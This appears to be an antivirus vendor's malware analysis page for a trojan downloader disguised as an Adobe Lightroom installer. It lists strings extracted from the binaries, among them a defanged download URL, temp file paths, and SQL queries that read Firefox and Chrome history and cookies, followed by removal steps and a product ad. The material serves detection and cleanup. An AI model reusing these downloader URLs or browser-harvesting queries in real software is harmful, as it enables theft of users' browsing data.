rdoptic.com/de/?q=YWZmaWxpYXRlX2lkPTQ0OS00Mjc2NDQ1JmZpbGVzaXplPTIuNE1iJnB1Ymxpc2hlcklkPTI0NDM3JnByb2R1Y3RfbmFtZT1BZG9iZSUyMFBob3Rvc2hvcCUyMExpZ2h0cm9vbSUyMENDJTIwMiZwcm9kdWN0X3RpdGxlPUFkb2JlJTIwUGhvdG9zaG9wJTIwTGlnaHRyb29tJTIwQ0MlMjAyJnByb2R1Y3RfZG93bmxvYWRfdXJsPWh0dHAlM2ElMmYlMmZkM3BjY3VwMTl4ZGEydC5jbG91ZGZyb250Lm5ldCUyZnNldmVuemlwLXNldHVwLXJ4LmV4ZSZwcm9kdWN0X2ZpbGVfbmFtZT1zZXZlbnNldHVwLmV4ZSZpbnN0YWxsZXJfZmlsZV9uYW1lPXNldHVw
0123456789 /
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\z1CUzZZucM.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
z1CUzZZucM.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
1477051436
4399154
1745486329
-1995832059
hXXp://get.file136desktop.info/DownloadManager/Get?p=638&d=544&l=461&n=1&productname=sevenzip&d1=4276445&d2=449&dynamicname=Adobe%20Photoshop%20Lightroom%20CC%202
d,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=449&subid2=4276445
QepdDtLTW.exe
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
1.1.1.6
1.0.0.8

z1CUzZZucM.exe_1376_rwx_003D4000_00001000:

callback%d

z1CUzZZucM.exe_1376_rwx_10001000_00007000:

/key=
.text
`.rdata
@.data
.rsrc
@.reloc

setup-1228.exe_1136:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\bedhgjgbdh.exe 4|8|0|5|1|5|2|7|3|5|6 K0hJPzwxMTEdKk1ROlBEQzguGSxJP1BPT01KREI2LhspQEFTT0g/Oy4xLxorO0k/PCseKE1NSUBNQ09eREI2MTErHCdTQFFRQ0tcUExINWhvc2s4KCxubHImREBSRitNTEsnPUhQKUhJREgdKj1IQUNGSD87GSw/KzksMjI1LzIuHSo LjU0LzgbLT0wOCctGC8/MzgrKh0qPjE1LSwfKk5LTD9PP0xfS1FEVDpAVDccJ1BNTj9TPFFaP1FEQTgfKk5LTD9PP0xfSUBIQzY X2leXSUtL0tmaHFqbWRncCAxK0piZGNubmdvaCQtLjxAICwsKiAqRFNDWFJNRjkYL0BXQF08Sj9GRUZFOB8qRkhQT1k Sk9SUkBQNjIbKVBAQUlKVE1OXFBMSDUgKlVIOysdKj5PKT0bLk1TR1FER0FXV0BLPk1GQkRHPT9FUFFHOxksRE1bSlVJU0RLPjpvbHFdICpRQFJOT0lDSj9fUFJAUFhBPFNPNTIbLkNHPUJTNy0YL0RSWkJSSzxHRTtfQE0 UFJNTz9ANWZca25jGSw/SVNGTEpAP11CTTgtMyY1Mi0sNCcuMzMcJ1A8UTxKRUJHWUVGU09AR0o2cW1vYRgvT0hIQzYuLy0zLzAvNjEyGSw/SVNGTEpAP11NRkg/OS8vLTMqMCkuMCQuMjIxOSsyIz5I
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh7.tmp\ZipDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh7.tmp
\\?\unc\
zcÁ
65708<8`9
<'</<5<;<|<
5 5$5(5,5
-*!$%d:ZU1N
GetCPInfo
ZipDLL.dll
Error: %s
Could not extract %s
Error: Could not extract %s
Extract : %s
Extracting %d files and directories
Extracting contents of %s to %s
Extracting the file %s from %s to %s
%s (%s)
Incorrect password set for the file being decrypted
1.1.4
nsh7.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh7.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr5.tmp\setup-1228.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr5.tmp
setup-1228.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
-&$.-$(.
"$&-6}
.")---.,1}
$"$-.(--.-9
--&(-,/-9
.)).-,-  8
-$---  -,/ -5
"-)-,, -/1/ 6?
--(- --..../6/8
(--,-  1/ 11618
, - 11//166,)58
""$"-- "".
" " $($ (--.(
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
00000000
8376.15724.1374.225

bedhgjgbdh.exe_1980:

.text
`.rdata
@.data
.rsrc
@.reloc
xSSSh
FTPjKS
FtPj;S
C.PjRV
.hpIO
F%D,3
Visual C   CRT: Not enough memory to complete call to strerror.
portuguese-brazilian
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
Error %u in WinHttpQueryDataAvailable.
Error %u in WinHttpReadData.
Error %d has occurred.
3.7.16.2
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYS
X:X:X:X:X:X
\Google\Chrome\Application\chrome.exe
%d/%d/%d %d:%d:%d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
WinHttpCloseHandle
WinHttpOpen
WinHttpSetTimeouts
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpWriteData
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WINHTTP.dll
GetProcessHeap
KERNEL32.dll
CreateDialogIndirectParamW
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
URLDownloadToFileW
urlmon.dll
IPHLPAPI.DLL
GetCPInfo
zcÁ
.?AV?$CAtlExeModuleT@VCSmartInstallerModule@@@ATL@@
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
no such collation sequence: %s
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch - "%w" referencing "%w"
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
foreign_key_check
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
too many references to "%s": max 65535
%s.%s.%s
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
.?AVCWebPage@@
{A0386B19-B7E7-4BE7-B567-ABF77CBB6E60} = s `ATLExecServer'
`ATLExecServer.EXE'
val AppID = s {BCCC2C7F-1383-417B-944F-1677DF428E44}
ForceRemove {FA20B59B-21AA-44FC-8A68-450979B7CC90} = s 'CBrowserExternals Class'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{D14931FB-8313-4BCC-91EB-62F4EF2A8FC4}'
ForceRemove {622D38AD-B4A9-4170-8192-5B865C6A5DCE} = s 'CBrowserExternalImp Class'
ForceRemove {D14931FB-8313-4BCC-91EB-62F4EF2A8FC4} = s 'CBrowserExternal Class'
stdole2.tlbWWW
Created by MIDL version 7.00.0555 at Thu Jul 23 08:00:39 2015
5o:y:
6!7,7074787<7
$0.040<0
5&898*9>9
(2/2~286?6
5 5$5(5,50545
7,707478729
4_5
5(5<5@5|5
9 9$9(9,9094989<9
6 6$6(6,606
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
nKERNEL32.DLL
WUSER32.DLL
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
WinHttpClient
n2d.exe
downoad.exe
888816666554443
6666554443
!6666554443
OfferURL
ExeURL
ExeURL2
RegKey
ReportName
PreExe
PostExe
RegKey64
AntivirusesRegKeys
PreExeResultTerm
PreExeResultValue
PostExeResultTerm
PostExeResultValue
PostRegKey32
PostRegKey64
RegKey32
5-1-3-1-9-4-4-8-3-3-1
P0RDQExIUDpPTFZORE8=
firefox
chrome
opera
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
ChromeHTML
FirefoxHTML
IE.AssocFile.HTM
Opera.HTML
http\shell\open\command
Opera.exe
Safari.exe
SOFTWARE\Mozilla\Mozilla FireFox
Software\Mozilla\Mozilla FireFox
SOFTWARE\Google\Update\Clients\{8A69D345-D564-463c-AFF1-A69D9E530F96}
aSoftware\Mozilla\Mozilla Firefox
*.txt
@@exeurl
OLEACC.DLL
exeurl
execmdline
a\Mozilla\Firefox\Profiles
\Mozilla\Firefox\Profiles
sqlite
places.sqlite
SELECT url FROM moz_places WHERE url LIKE '%
Chrome_WidgetWin_1
a\..\Local\Google\Chrome\User Data\Default\
\..\Local Settings\Application Data\Google\Chrome\User Data\Default\
SELECT urls.url FROM urls WHERE urls.url LIKE '%
cookies.sqlite
\..\Local\Google\Chrome\User Data\Default\
\Opera\Opera\
SELECT value,last_access_utc FROM cookies WHERE host_key LIKE '%
acookies4.dat
\..\..\Local Settings\Application Data\Opera\Opera\
MAdvapi32.dll
\default.html
{BCCC2C7F-1383-417B-944F-1677DF428E44}
Mscoree.dll
B.tlb
OLEAUT32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\bedhgjgbdh.exe
2015.724.00.64
20157240064.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    wmic.exe:828
    dwwin.exe:1200
    setup-1228.exe:1136
    bedhgjgbdh.exe:1980

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\81437704772.txt (238 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12E5B5.dmp (80387 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (165 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\z1CUzZZucM.exe (8156 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bedhgjgbdh.hdbgjgh (10448 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh7.tmp\ZipDLL.dll (5500 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bedhgjgbdh.exe (9483 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\hdbgjgh.zip (67124 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh7.tmp\jqhaleu.dll (4070 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\e4a9_appcompat.txt (9440 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsDialogs.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\751377546 (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm4.tmp (1826 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsArray.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\BgWorker.dll (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\setup-1228.exe (66159 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now